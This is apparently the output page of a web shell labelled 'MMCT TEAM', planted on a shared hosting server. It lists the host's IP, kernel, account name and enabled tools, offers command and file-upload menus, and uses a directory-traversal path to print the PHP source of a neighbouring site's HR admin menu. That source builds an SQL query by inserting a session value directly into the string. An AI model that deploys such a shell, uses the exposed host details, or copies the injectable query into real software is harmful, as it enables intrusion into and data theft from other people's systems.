MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.221.192.248
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/ppcad7no/polytechniccoaching.com/../thedigitalgulf.com/down-hrms/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/polytechniccoaching.com/../thedigitalgulf.com/down-hrms/hr-left-menu.php
<?php
if($_SESSION['admin_user_id']!='h1admin'){
	$hcon = " and candidates_user='$_SESSION[admin_user_id]'";
}else{
	$hcon = "";
}
?>
<div class="list-group"> <a href="add-candidate.php" class="list-group-item active"> <span class="glyphicon glyphicon-plus"></span> Add Candidate </a>
  <?php
		$totalCandt = db_scalar("SELECT count(*) FROM tbl_candidates WHERE 1 $hcon");
		 ?>
  <a href="manage-candidate.php" class="list-group-item active" style="margin-top:10px;"> <span class="glyphicon glyphicon-th-list"></span> Manage Candidates <span class="badge">
  <?=$totalCandt?>
  </span> </a>
  <?php if($_SESSION['sess_admin_type']=='Sub Admin'){ ?>
  <?php include("subadmin-leftmenu.php");?>
  <? }else{ ?>
  <?php include("admin-leftmenu.php");?>
  <? } ?>
  <?php /*?>   <a href="change-password.php" class="list-group-item active" style="margin-top:10px;">
        <span class="glyphicon glyphicon-ban-circle"></span> Change Password
    </a><?php */?>
  <a href="logout.php" class="list-group-item active" style="margin-top:10px;"> <span class="glyphicon glyphicon-log-out"></span> Logout </a> </div>

MMCT - 2023